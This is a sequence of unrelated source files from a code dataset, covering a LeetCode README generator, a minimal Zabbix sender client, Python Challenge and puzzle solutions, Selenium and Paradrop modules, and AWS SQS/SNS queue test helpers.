mean_rates.append(estimate_mean_rate(m, position[~is_replay]))\n joint_models.append(\n train_joint_model(m, position[~is_replay], density_model,\n model_kwargs))\n marginal_models.append(\n train_marginal_model(m, position[~is_replay],\n occupancy_marginal_model, occupancy_kwargs))\n\n return partial(\n multiunit_likelihood,\n place_bin_centers=place_bin_centers,\n occupancy_model=occupancy_model,\n joint_models=joint_models,\n marginal_models=marginal_models,\n mean_rates=mean_rates\n )\n","sub_path":"replay_identification/multiunit_likelihood.py","file_name":"multiunit_likelihood.py","file_ext":"py","file_size_in_byte":11872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"260058666","text":"import os, glob\nimport shutil\n\ndef extension(x):\n \"\"\"\n >>> extension(\"asdf.asdf\")\n '.asdf'\n \"\"\"\n lst = x.split(\".\")\n return \".\" + lst[-1]\n\ndef getProbNum(x):\n index = x.index(\".\")\n return x[0:index]\n\n# os.remove(\"README.md\")\nf = open(\"README.txt\",\"w+\")\n\nf.write(\"## LeetCode Solutions\\n\\n\")\n\nlst = []\nfor file in os.listdir(\"E:\\Documents\\GitHub\\LeetCodeDir\\LeetCode\"):\n lst.append(os.path.join(file))\nlst.sort()\n\nf.write(\"Problem # | Language | Difficulty\\n\")\nf.write(\":---: | :---: | :---:\\n\")\n\neasyNum, medNum, hardNum = 0, 0, 0\n\nfor x in lst:\n acceptedFileExts = [\".py\", '.java', '.sql', '.txt']\n\n if extension(x) not in acceptedFileExts:\n continue\n\n difficulty = \"\"\n language = \" (Unknown)\"\n multipleSolutions = \"\"\n\n if \"E\" in x:\n difficulty = \" Easy \"\n easyNum += 1\n elif \"M\" in x:\n difficulty = \"Medium\"\n medNum += 1\n else:\n difficulty = \" Hard \"\n hardNum += 1\n\n if \"PLUS\" in x:\n multipleSolutions = \" (Multiple Solutions)\"\n\n if x.endswith(\".py\"):\n language = \"Python\"\n elif x.endswith(\".txt\"):\n language = \"Text\"\n elif x.endswith(\".sql\"):\n language = \"SQL\"\n elif x.endswith(\".java\"):\n language = \"Java\"\n\n f.write(\"[\" + getProbNum(x) +\"](LeetCode/\" + x + \") | \" + language + \" | \" + difficulty + \"\\n\")\n\ntotal = easyNum + medNum + hardNum\nf.write(\"\\nEasy %: \"+ str(easyNum / total * 100)[:5] +\" \\n\")\nf.write(\"Medium %: \"+ str(medNum / total * 100)[:5] +\" \\n\")\nf.write(\"Hard %: \"+ str(hardNum / total * 100)[:5] +\" \\n\")\n\nf.write(\"\\n\\n\")\nf.write(\"[Project Euler Solutions](https://github.com/chrismarcok/Project-Euler)\\n\\n\")\nf.write(\"[My LeetCode Profile](https://leetcode.com/chrismarcok/)\")\n\nf.close()\nshutil.copyfile(\"README.txt\", \"README.md\")\nos.remove(\"README.txt\")\n","sub_path":"readme.py","file_name":"readme.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"295722788","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2011 Enrico Tröger \n# License: GNU GPLv2\n\n\"\"\"\nMinimal implementation of the Zabbix sender protocol in Python.\nIt should just show the basic idea, there is no error handling at all.\n\"\"\"\nimport json\nimport socket\nimport struct\nimport re\n\n_expr_info = re.compile(r'Processed \\d+ Failed (\\d+).+')\n\ndef get_zabbix_server(config_file='/etc/zabbix/zabbix_agentd.conf'):\n\tserver = None\n\twith open(config_file) as f:\n\t\tfor line in f:\n\t\t\tif line[:7] == 'Server=':\n\t\t\t\tserver = line[7:].strip()\n\treturn server\n\ndef send(host, key, value, zabbix_server = '127.0.0.1', port = 10051, ):\n\tHEADER = '''ZBXD\\1%s%s'''\n\t# just some data\n\tdata = '''{{\"request\":\"sender data\", \"data\":[ {{ \"host\":\"{}\", \"key\":\"{}\", \"value\":\"{}\"}} ] }} '''.format(host, key, value)\n\t\n\tdata_length = len(data)\n\tdata_header = struct.pack('i', data_length) + '\\0\\0\\0\\0'\n\t\n\tdata_to_send = HEADER % (data_header, data)\n\t\n\t# here really should come some exception handling\n\tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tsock.connect((zabbix_server, port))\n\t\n\t# send the data to the server\n\tsock.send(data_to_send)\n\t\n\t# read its response, the first five bytes are the header again\n\tresponse_header = sock.recv(5)\n\tif not response_header == 'ZBXD\\1':\n\t\traise ValueError('Got invalid response')\n\t\n\t# read the data header to get the length of the response\n\tresponse_data_header = sock.recv(8)\n\tresponse_data_header = response_data_header[:4] # we are only interested in the first four bytes\n\tresponse_len = struct.unpack('i', response_data_header)[0]\n\t\n\t# read the whole rest of the response now that we know the length\n\tresponse_raw = sock.recv(response_len)\n\t\n\tsock.close()\n\t\n\tresponse = json.loads(response_raw)\n\treturn _expr_info.findall(response['info'])[0]\n","sub_path":"zabbix/pyzabbix_sender.py","file_name":"pyzabbix_sender.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"244801590","text":"'''\nhttp://www.pythonchallenge.com\n#6 url=\"http://www.pythonchallenge.com/pc/def/channel.html\"\nwe got the html comment \"\" in the web source code, then goto \"http://www.pythonchallenge.com/pc/def/zip.html\"\nwe got \"yes. find the zip. \".\nI guess it's not about the zip function in python, since there's no data in all the area.\nsomeone tell me that try to this address to get a zip file:\"http://www.pythonchallenge.com/pc/def/channel.zip\"\nthen we got lot of file,\n\nin the readme.txt, we know how to start this challenge:\nwelcome to my zipped list.\nhint1: start from 90052\nhint2: answer is inside the zip\n\nin the 90052.txt, we got below:\nNext nothing is 94191\n\ncollect the comment.\ncollect each files'comment in the zip file, and print the comment, got hockey by letters oxygen\ngoto \"http://www.pythonchallenge.com/pc/def/hockey.html\"\nit's in the air. look at the letters.\nthe letters is oxygen\n'''\nimport re\nfrom urllib import request\nimport zipfile\nfrom io import BytesIO\n\nurl = \"http://www.pythonchallenge.com/pc/def/channel.zip\"\nnn = '90052'\np1 = re.compile(r'Next nothing is [0-9]\\d*')\np2 = re.compile(r'[0-9]\\d*')\nlocalzf = BytesIO()\nwith request.urlopen(url) as f:\n zf = f.read()\n localzf.write(zf)\n files = zipfile.ZipFile(localzf)\ni=0\ncomments=[]\nwhile i < 1000:\n filename = nn+'.txt'\n s = files.read(filename).decode()\n print(filename,\"'s comment:\",files.getinfo(filename).comment)\n comments.append(files.getinfo(filename).comment.decode())\n print(str(i),s)\n if p1.match(s):\n nn = p2.search(s).group()\n else:\n print(\"It's the result: \",s)\n break\n i=i+1\nprint(\"\".join(comments))\n","sub_path":"pythonchallenge6.py","file_name":"pythonchallenge6.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"224469792","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\BaseTest.py\n# Compiled at: 2018-04-26 12:50:15\nimport unittest, json, os\nfrom selenium import webdriver\nfrom Action import Action\nfrom datetime import datetime\n\nclass BaseTest(unittest.TestCase):\n suite_data = object\n test_data = object\n execute_start_flow = False\n json_file = ''\n base_path = ''\n tests_info = None\n\n def __init__(self, test_name, json_file, suite_data, base_path, tests_info):\n super(BaseTest, self).__init__(test_name)\n self.json_file = json_file\n self.suite_data = suite_data\n self.base_path = base_path\n self.tests_info = tests_info\n self.info = {}\n\n def load_data(self):\n with open(self.json_file) as (json_data):\n json_text = json_data.read()\n return json.loads(json_text)\n\n def setUp(self):\n self.test_data = self.load_data()\n self.info['test_name'] = self.test_data['name']\n self.info['json_file'] = os.path.basename(self.json_file)\n self.info['start'] = str(datetime.now())\n if 'browser' in self.test_data:\n browser = self.test_data['browser']\n if browser == 'chrome':\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--disable-extensions')\n chrome_options.add_argument('--disable-gpu')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-extensions')\n chrome_options.add_argument('--incognito')\n self.d = webdriver.Chrome(chrome_options=chrome_options)\n elif browser == 'edge':\n self.d = webdriver.Edge()\n elif browser == 'firefox':\n self.d = webdriver.Firefox(executable_path=os.path.dirname(os.path.abspath(__file__)) + '\\\\geckodriver.exe')\n else:\n self.d = webdriver.Chrome()\n if 'implicitly_wait' in self.test_data:\n self.d.implicitly_wait(int(self.test_data['implicitly_wait']))\n else:\n self.d.implicitly_wait(3)\n self.d.get('data:text/html;charset=utf-8,
      executing test ' + self.test_data['name'] + '...
      ')\n self.d.maximize_window()\n\n def run_test(self):\n if self.execute_start_flow:\n self.execute_flow(self.suite_data['started_flow'])\n result = False\n try:\n try:\n self.execute_flow(self.test_data['flow'])\n result = True\n except Exception as e:\n self.info['message'] = str(e)\n\n finally:\n self.d.quit()\n self.info['end'] = str(datetime.now())\n self.info['result'] = str(result).lower()\n self.tests_info.append(self.info)\n\n def execute_flow(self, flow):\n action = Action(self.d, self.base_path)\n self.info['flow'] = []\n index = 0\n for step in flow:\n action.execute_step(step)\n step['index'] = index\n index += 1\n step['result'] = 'true'\n self.info['flow'].append(step)","sub_path":"pycfiles/SeleniumFramework-0.1.8-py2.7/BaseTest.py","file_name":"BaseTest.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"450845669","text":"###################################################################\n# Copyright 2013-2016 All Rights Reserved\n# Authors: The Paradrop Team\n###################################################################\n\n\"\"\"\nThis module generates update plans for a host configuration operation. It is\nseparate from the modules that generate plans for chute operations because we\nonly need to do a subset of the operations.\n\"\"\"\n\nfrom paradrop.base.output import out\nfrom paradrop.core.config import airshark, devices, haproxy, network, configservice, hostconfig, reservations, services, zerotier\n\nfrom . import plangraph\n\n\n# Update types that apply changes from host configuration.\nCONFIG_CHANGING_TYPES = set([\n \"inithostconfig\",\n \"sethostconfig\",\n \"patchhostconfig\"\n])\n\n\ndef generatePlans(update):\n out.verbose(\"%r\\n\" % (update))\n\n # Detect system devices and set up basic configuration for them (WAN\n # interface, wireless devices). These steps do not need to be reverted on\n # abort.\n #\n # checkSystemDevices may reboot the machine if expected devices are\n # missing.\n #\n # abortNetworkConfig is added as an abort command here so that it runs when\n # config.network.getNetworkConfig or just about anything else fails.\n #\n # reloadAll is added as an abort command here so that it runs when any of\n # the set* plans fail and back out.\n update.plans.addPlans(plangraph.STRUCT_GET_SYSTEM_DEVICES,\n (devices.getSystemDevices, ),\n (network.abortNetworkConfig, ))\n update.plans.addPlans(plangraph.CHECK_SYSTEM_DEVICES,\n (devices.checkSystemDevices, ))\n\n update.plans.addPlans(plangraph.STRUCT_GET_RESERVATIONS,\n (reservations.getReservations, ))\n\n update.plans.addPlans(plangraph.STRUCT_GET_HOST_CONFIG,\n (hostconfig.getHostConfig, ))\n\n # Save current network configuration into chute cache (key: 'networkInterfaces')\n update.plans.addPlans(plangraph.STRUCT_GET_INT_NETWORK,\n (network.getNetworkConfig, ))\n\n # Start haproxy. This does not depend on the host config, and we want\n # it setup even in cases where applying the host config failed.\n update.plans.addPlans(plangraph.RECONFIGURE_PROXY,\n (haproxy.reconfigureProxy, ))\n\n if update.updateType in CONFIG_CHANGING_TYPES:\n # Save current host configuration to disk.\n update.plans.addPlans(plangraph.STRUCT_SET_HOST_CONFIG,\n (hostconfig.setHostConfig, ),\n (hostconfig.revertHostConfig, ))\n\n # Apply host configuration to system configuration.\n update.plans.addPlans(plangraph.STRUCT_SET_SYSTEM_DEVICES,\n (devices.setSystemDevices, ),\n (configservice.reloadAll, ))\n\n # Apply zerotier configuration.\n update.plans.addPlans(plangraph.ZEROTIER_CONFIGURE,\n (zerotier.configure, ))\n\n # Apply Airshark configuration.\n update.plans.addPlans(plangraph.AIRSHARK_CONFIGURE,\n (airshark.configure, ))\n\n # Configure telemetry service.\n update.plans.addPlans(plangraph.TELEMETRY_SERVICE,\n (services.configure_telemetry, ))\n\n # Reload configuration files\n todoPlan = (configservice.reloadAll, )\n update.plans.addPlans(plangraph.RUNTIME_RELOAD_CONFIG, todoPlan)\n\n # Reload configuration files if aborting. This needs to happen at the\n # right place in the update pipeline such that UCI files have been\n # restored to their previous contents.\n todoPlan = (configservice.reload_placeholder, )\n abtPlan = (configservice.reloadAll, )\n update.plans.addPlans(plangraph.RUNTIME_RELOAD_CONFIG_BACKOUT, todoPlan, abtPlan)\n","sub_path":"paradrop/daemon/paradrop/core/plan/hostconfig.py","file_name":"hostconfig.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"267414412","text":"import sys\nfrom itertools import combinations\nsys.stdin = open('input_1486.txt', 'r')\n\nT = int(input())\n\nfor t in range(1, T+1):\n N, B = map(int, input().split())\n lst = [x for x in range(N)]\n num = []\n for i in range(1, N+1):\n num += list(combinations(lst, i))\n\n tall = list(map(int, input().split()))\n result = []\n for j in range(len(num)):\n ans = 0\n for k in num[j]:\n ans += tall[k]\n if ans >= B:\n result.append(ans)\n print('#{} {}'.format(t, min(result)-B))\n\n","sub_path":"SWEA/1486_장훈이의높은선반.py","file_name":"1486_장훈이의높은선반.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"280925547","text":"import tkinter\r\nimport sys\r\n\r\nclass MenuBar(tkinter.Menu):\r\n def __init__(self, parent):\r\n tkinter.Menu.__init__(self, parent)\r\n\r\n fileMenu = tkinter.Menu(self, tearoff=False)\r\n self.add_cascade(label=\"File\",underline=0, menu=fileMenu)\r\n fileMenu.add_command(label=\"Exit\", underline=1, command=self.quit)\r\n\r\n def quit(self):\r\n sys.exit(0)\r\n\r\nclass App(tkinter.Tk):\r\n def __init__(self):\r\n tkinter.Tk.__init__(self)\r\n menubar = MenuBar(self)\r\n self.config(menu=menubar)\r\n\r\nif __name__ == \"__main__\":\r\n app=App()\r\n app.mainloop()","sub_path":"class/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"468511218","text":"def rotate(n):\n no = str(n)\n temp = no[-1]\n temp += no[0:len(no)-1]\n return int(temp)\n\nsum = 0\nfor i in range(10, 10**100):\n n = rotate(i)\n if i>n:\n if (i / n) == int(i/n):\n sum += int(str(i)[len(str(i)) - 5 :])\n #print(i)\n else:\n if (n / i) == int(n / i):\n sum += int(str(n)[len(str(n)) - 5:])\n #print(n)\nprint(sum)","sub_path":"168.py","file_name":"168.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"157950508","text":"# assumes credentials are in ~/.aws/credentials\nimport boto3, re\nimport argparse\n#import sns_ops\nimport json, random\nfrom robot.api import logger\n\n################# Generalized Queue Functions ###########\ndef createQueueAndSubscribe(name_prefix, topicArn):\n name = name_prefix + str(random.randint(1, 999999))\n create_queue_status, name = createQueue(name)\n if create_queue_status:\n attribute_status, sqs_queue = getQueueAttributes(name)\n if attribute_status:\n policy_status, response = addSnsReadPolicy(name, topicArn)\n if policy_status:\n subscribe_status, response = subscribeSqsQueueToTopic(sqs_queue, topicArn)\n if subscribe_status:\n subscriptionArn = response['SubscriptionArn']\n return True, name, subscriptionArn\n else:\n return False, \"Failed while subscribing to topic\", None\n else:\n return False, \"Failed while adding sns read policies\", None\n else:\n return False, \"Failed getting queue attributes\", None\n else:\n return False, \"Failed creating the queue\", None\n\ndef checkQueueExists(name):\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n # logger.console('################ line # 84 #########################')\n logger.console('queue name is')\n logger.console(name)\n try:\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n logger.console('Queue Exists ' + str(sqs_url))\n respone = True\n except Exception as e:\n # logger.console('################ line # 91 #########################')\n logger.console('Exception while checking queue exists ' + str(e))\n respone = False\n finally:\n # logger.console('################ line # 95 #########################')\n logger.console('Response of check if queue exists ' + str(respone))\n return respone\n\ndef createQueue(name):\n try:\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Creating queue ' + name)\n response = sqs_client.create_queue(QueueName=name)\n logger.console('Response of creating queue ' + str(response))\n return True, name\n except Exception as e:\n logger.console('Exception while creating a queue ' + str(e))\n return False, \"Failed while creating sqs queue\"\n\n\ndef getTotalSubscriptionCount():\n sns_client = boto3.client('sns', region_name='us-west-2')\n response = sns_client.list_subscriptions()\n try:\n totalSubscriptions = len(response['Subscriptions'])\n return True, totalSubscriptions\n except Exception as e:\n return False, e\n\ndef listAndDeleteAllSubscriptions():\n sns_client = boto3.client('sns', region_name='us-west-2')\n response = sns_client.list_subscriptions()\n logger.info(response)\n try:\n totalSubscriptions = len(response['Subscriptions'])\n logger.info(\"total Subscriptions are:\" + str(totalSubscriptions))\n for subscription in response['Subscriptions']:\n subscriptionArn = subscription['SubscriptionArn']\n unsubscribeResponse = sns_client.unsubscribe(SubscriptionArn=subscriptionArn)\n return True, response\n except Exception as e:\n return False, e\n\n\ndef deleteSubscription(subscriptionArn):\n sns_client = boto3.client('sns', region_name='us-west-2')\n try:\n unsubscribeResponse = sns_client.unsubscribe(SubscriptionArn=subscriptionArn)\n return True, unsubscribeResponse\n except Exception as e:\n return False, e\n\ndef deleteQueue(name):\n try:\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Deleting queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.delete_queue(QueueUrl=sqs_url)\n return True, response\n except Exception as e:\n # logger.console('################ line # 91 #########################')\n logger.console('Exception while checking queue exists ' + str(e))\n return False, str(e)\n\ndef getQueueAttributes(name):\n try:\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.get_queue_attributes(QueueUrl=sqs_url, AttributeNames=['All'])\n logger.console('Response of get queue attributes ' + str(response))\n return True, response\n except Exception as e:\n logger.console('Exception while getting a queue attributes' + str(e))\n return False, \"Failed while getting sqs queue attributes\"\n\ndef subscribeSqsQueueToTopic(sqs_queue, topic_arn):\n try:\n sns_client = boto3.client('sns', region_name='us-west-2')\n # logger.console('################ line # 59 #########################')\n response = sns_client.subscribe(TopicArn=topic_arn, Protocol='sqs',\n Endpoint=sqs_queue['Attributes']['QueueArn'], ReturnSubscriptionArn=True)\n # logger.console('################ line # 61 #########################')\n logger.console('Response of Subscribing to topic ' + str(response))\n # logger.console('################ line # 63 #########################')\n logger.info(\"subscription message response\")\n logger.info(response)\n return True, response\n except Exception as e:\n logger.console('Exception while subscribing to topic ' + str(e))\n logger.console('################ line # 67 #########################')\n return False, \"Failed while subscribing sqs queue to topic\"\n\n\ndef read(name):\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Receiving from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.receive_message(QueueUrl=sqs_url, MaxNumberOfMessages=10, WaitTimeSeconds=20)\n logger.console('Response of reading queue ' + str(response))\n return response\n\n\n############## PSM Queue Functions ##############\ndef readAndLogAndDeleteMessagePSM(name):\n status, sqs_queue = getQueueAttributes(name)\n message_count = sqs_queue['Attributes']['ApproximateNumberOfMessages']\n logger.console(\"message count is\" + str(message_count))\n logger.info(\"message count is\" + str(message_count))\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n try:\n all_messages = response['Messages']\n except KeyError:\n logger.info('No messages on the queue!')\n all_messages = []\n return True, \"No more messages in the queue\", '', '', all_messages\n\n for message in all_messages:\n logger.info('################ line # 125 #########################')\n MessageId = message['MessageId']\n logger.info('MessageId is:')\n logger.info(MessageId)\n body = message['Body']\n data = json.loads(body)\n eventRaw = data['Message']\n event = json.loads(eventRaw)\n logger.info('event is:')\n logger.info(event)\n eventPID = event['eventData']['productInstance']['productInstanceId']\n logger.info('################ line # 136 #########################')\n logger.info('########## productInstanceId from event is ###################### ')\n logger.info(eventPID)\n oldState = event['eventData']['oldState']\n newState = event['eventData']['newState']\n logger.info('old and new states are ' + str(oldState) + ' ' + str(newState))\n #sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n\ndef readAndDeleteMessagePSMForGivenState(name, oldState, newstate, pidMapping, *argv):\n logger.info(\"input is:\")\n logger.info(argv)\n logger.info(oldState)\n logger.info(newstate)\n logger.info(\"argv=\"+str(argv))\n\n status, sqs_queue = getQueueAttributes(name)\n message_count = sqs_queue['Attributes']['ApproximateNumberOfMessages']\n logger.console(\"message count is\" + str(message_count))\n logger.info(\"message count is\" + str(message_count))\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n try:\n all_messages = response['Messages']\n except KeyError:\n logger.info('No messages on the queue!')\n return True, pidMapping, \"No more messages in the queue\"\n for message in all_messages:\n #logger.info('################ line # 73 #########################')\n #logger.info('################ line # 132 #########################')\n MessageId = message['MessageId']\n logger.info('MessageId is:')\n logger.info(MessageId)\n body = message['Body']\n data = json.loads(body)\n eventRaw = data['Message']\n event = json.loads(eventRaw)\n logger.info('event is:')\n logger.info(event)\n eventPID = event['eventData']['productInstance']['productInstanceId']\n logger.info('########## productInstanceId from event is###################### ')\n logger.info(eventPID)\n if eventPID in argv:\n logger.info('found a match of event for given product instance id' + str(eventPID))\n characteristics = event['eventData']['productInstance']['characteristics']\n\n if event['eventData']['newState'] == newstate and event['eventData']['oldState'] == oldState:\n #logger.info('################ line # 506 #########################')\n pidMapping[eventPID] = [event['eventData']['oldState']]\n #logger.info('################ line # 507 #########################')\n logger.info(pidMapping)\n pidMapping[eventPID].append(event['eventData']['newState'])\n #logger.info('################ line # 511 #########################')\n #logger.info(pidMapping)\n\n if len(event['eventData']['productInstance']['prices'])>0:\n spbPrice_Category = event['eventData']['productInstance']['prices'][0]['characteristics'][0]['value']\n pidMapping[eventPID].append(spbPrice_Category)\n else:\n logger.info(\"fulfillment!\")\n pidMapping[eventPID].append(0)\n #logger.info('################ line # 515 #########################')\n #logger.info(pidMapping)\n pidMapping[eventPID].append('')\n pidMapping[eventPID].append('')\n pidMapping[eventPID].append('')\n pidMapping[eventPID].append('')\n\n productKind = event['eventData']['productInstance']['kind']\n pidMapping[eventPID][5] = productKind\n #logger.info('################ line # 518 #########################')\n for characteristic in characteristics:\n try:\n #logger.info(\"char name in loops is:\")\n #logger.info(characteristic['name'])\n if characteristic['name'] == 'PSM_PRODUCT_KIND':\n #logger.info('################ line # 523 #########################')\n #logger.info(\"detail char is:\")\n #logger.info(characteristic)\n #logger.info('################ line # 529 #########################')\n psmProductKind = characteristic['value']\n #logger.info('################ line # 531 #########################')\n #logger.info(\"psmProductKind is:\")\n #logger.info(psmProductKind)\n pidMapping[eventPID][3] = psmProductKind\n #logger.info('################ line # 535 #########################')\n #logger.info(pidMapping)\n if characteristic['name'] == 'SPB:billingAccountId':\n #logger.info('################ line # 539 #########################')\n spbBillingAccount = characteristic['value']\n #logger.info(\"spbBillingAccount is:\")\n #logger.info(spbBillingAccount)\n pidMapping[eventPID][4] = spbBillingAccount\n #logger.info('################ line # 544 #########################')\n #logger.info(pidMapping)\n if characteristic['name'] == 'SPB:serviceFileLocationId':\n logger.info('################ line # 367 #########################')\n serviceFileLocationId = characteristic['value']\n logger.info(\"serviceFileLocationId is:\")\n logger.info(serviceFileLocationId)\n pidMapping[eventPID][6] = serviceFileLocationId\n logger.info('################ line # 544 #########################')\n logger.info('after serviceFileLocationId' + str(pidMapping))\n\n except Exception as e:\n #logger.info('################ line # 179 #########################')\n logger.info('SPB:billingAccountId And/OR PSM_PRODUCT_KIND missing in PSM event') +str(e)\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n #logger.info('################ line # 555 #########################')\n count = len(pidMapping)\n #logger.info(\"length of pid mapping dict inside python is:\")\n #logger.info(count)\n #logger.info('################ line # 558 #########################')\n if count == len(argv):\n logger.info('RETURNING')\n return True, pidMapping, event\n else:\n logger.info(\"contains PID but new state is not\" + str(newstate) + \"and is: \" + str(event['eventData']['newState']))\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n else:\n #logger.info('################ line # 566 #########################')\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n\n #logger.info('################ line # 560 #########################')\n #logger.info('################ line # 562 #########################')\n logger.info('did not find a match for all product instance ids in PSM SNS' + str(argv))\n return False, pidMapping, all_messages\n\n\n\ndef readAndDeleteMessagePSMForGivenCharacteristics(name, producInstanceId, characteristicsName):\n status, sqs_queue = getQueueAttributes(name)\n message_count = sqs_queue['Attributes']['ApproximateNumberOfMessages']\n logger.console(\"message count is\" + str(message_count))\n logger.info(\"message count is\" + str(message_count))\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n try:\n all_messages = response['Messages']\n except KeyError:\n logger.info('No messages on the queue!')\n return True, False, \"No more messages in the queue\"\n for message in all_messages:\n MessageId = message['MessageId']\n logger.info('MessageId is:')\n logger.info(MessageId)\n body = message['Body']\n data = json.loads(body)\n eventRaw = data['Message']\n event = json.loads(eventRaw)\n logger.info('event is:')\n logger.info(event)\n eventPID = event['eventData']['productInstance']['productInstanceId']\n logger.info('########## productInstanceId from event is###################### ')\n logger.info(eventPID)\n eventType = event['eventHeader']['eventType']\n if eventPID == producInstanceId and eventType == 'ProductInstanceCharacteristicsUpdateEvent':\n logger.info('found a match of event for given product instance id' + str(eventPID))\n updatedCharacteristics = event['eventData']['updatedCharacteristics']\n for updatedCharacteristic in updatedCharacteristics:\n if updatedCharacteristic['name'] == characteristicsName:\n characteristicsValue = updatedCharacteristic['value']\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n return True, characteristicsValue, event\n\n logger.info('Given characteristics is missing in PSM event')\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n return False, False, event\n logger.info('did not find a match for given prod instance id in PSM SNS' + str(producInstanceId))\n return False, False, all_messages\n\n############## CMS Queue Functions ##############\ndef readAndDeleteMessageCMSWithState(name, contractInstanceId):\n status, sqs_queue = getQueueAttributes(name)\n message_count = sqs_queue['Attributes']['ApproximateNumberOfMessages']\n logger.console(\"message count is\" + str(message_count))\n logger.info(\"message count is\" + str(message_count))\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n try:\n all_messages = response['Messages']\n except KeyError:\n logger.info('No messages on the queue!')\n all_messages = []\n return True, True, \"No more messages in the queue\", all_messages\n\n for message in all_messages:\n MessageId = message['MessageId']\n logger.console('MessageId is:')\n logger.console(MessageId)\n body = message['Body']\n logger.info('################ line # 331 #########################')\n data = json.loads(body)\n logger.info('################ line # 333 #########################')\n eventRaw = data['Message']\n logger.info('################ line # 334 #########################')\n logger.info('eventRaw is:')\n logger.info(eventRaw)\n logger.info(\"type of eventRaw is\")\n logger.info(type(eventRaw))\n #event = eventRaw\n event = eventRaw.replace(\"'\",\"\")\n logger.info(\"type of event is\")\n logger.info(type(event))\n logger.info('event is:')\n logger.info(event)\n #keyContractId, valueContractId, keyIsSigned, valueIsSigned = re.split('\" |,|: ', event)\n '''\n MessageId = message['MessageId']\n logger.info('MessageId is:')\n logger.info(MessageId)\n body = message['Body']\n data = json.loads(body)\n eventRaw = data['Message']\n event = json.loads(eventRaw)\n '''\n parsedEvent = json.loads(event)\n logger.info('parsedEvent is:')\n logger.info('################ line # 335 #########################')\n logger.info(parsedEvent)\n # event = json.loads(event)\n logger.info('################ line # 336 #########################')\n eventContractId = parsedEvent['eventData']['contractId']\n logger.info('################ line # 337 #########################')\n logger.info(\"parsed id is\")\n logger.info(eventContractId)\n logger.info(\"input id is\")\n logger.info(contractInstanceId)\n if eventContractId == contractInstanceId:\n logger.info('################ line # 338 #########################')\n logger.info('found a match of event for a given contract instance id')\n logger.info(parsedEvent)\n eventState = parsedEvent['eventData']['eventState']\n logger.info('################ line # 399 #########################')\n #parsedIsSigned, rawString3 = re.split('}', valueIsSigned)\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n logger.info('################ line # 403 #########################')\n return True, eventState, parsedEvent\n else:\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n logger.info('did not find a match for contract instance id in CMS SNS' + str(contractInstanceId))\n return False, False, all_messages\n\n\n############## SISM Queue Functions 